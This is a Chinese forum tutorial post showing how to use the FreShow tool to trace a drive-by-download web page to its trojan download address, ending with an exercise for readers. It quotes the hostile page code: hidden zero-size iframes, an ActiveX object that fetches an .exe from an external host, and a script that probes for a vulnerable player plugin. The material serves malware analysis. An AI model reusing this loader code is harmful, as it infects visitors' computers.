回复: 通过实例讲解freshow方法
4.继续filter 右面收集区域又多了几个网址
5.点击http://brrtydwsw.cn/07/new.html 按check
<iframe src=ytqm.htm width=100 height=0></iframe>
<script src="js.js"></script>
6.继续fliter 点击http://brrtydwsw.cn/07/ytqm.htm 继续check
<html>
<head>
<meta http-equiv="Content-Type" c>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<br>
<object classid="clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365" codebase="http://oiuhfww.cn/7.exe#version=1,0,0,002" width="0" height="0">
</object>
</body>
</html>
在这里注意:
http://oiuhfww.cn/7.exe 这个就是木马下载地址
把那个木马下载网址复制到右下方obj空白处 然后按insert 就ok了
好了 现在我把真正木马下载地址找到完毕后 就开始输出日志了
选中右面all前面的勾 然后按log钮
Log is generated by FreShow.
[wide]http://ln.vnet.cn/ads.js
[frame]http://brrtydwsw.cn/07/0007.htm?22
[frame]http://brrtydwsw.cn/07/new.html
[frame]http://brrtydwsw.cn/07/ytqm.htm
[object]http://oiuhfww.cn/7.exe
[script]http://brrtydwsw.cn/07/js.js
[script]http://brrtydwsw.cn/07/\"http:\/\/js.t0ngji.cn.yahoo.com\/1103014\/ystat.js\"
[script]http://brrtydwsw.cn/07/\"http:\/\/js.tongji.cn.yahoo.com\/1103014\/ystat.js\"
再本贴下面回复中 粘贴一下 就看到日志了
出一道问题
那个挂马网址才解一半 你尝试继续解http://brrtydwsw.cn/07/js.js
可能考虑部分人打不开 源码在下面
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=100 height=0 src=yt14.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytfl.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytff.htm></iframe>");
document.write("<iframe width=100 height=0 src=ytvod.htm></iframe>");
if(navigator.userAgent.toLowerCase().indexOf("msie 7")>0)
document.write("<iframe src=ytxxz.htm width=100 height=0></iframe>");
try{var m;
var of=new ActiveXObject("MPS"+".S"+"to"+"rm"+"Pl"+"ay"+"er.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=ytbb.htm></iframe>");}}
document.write("<iframe width=100 height=0 src=yt122121.htm></iframe>");
他的木马下载地址是什么? 只要解出来一个就行 因为那里所有挂的都是一个木马下载地址
这个挂马方式没有采用任何加密 挂马网址清晰可见
答案在下面 回帖就能看见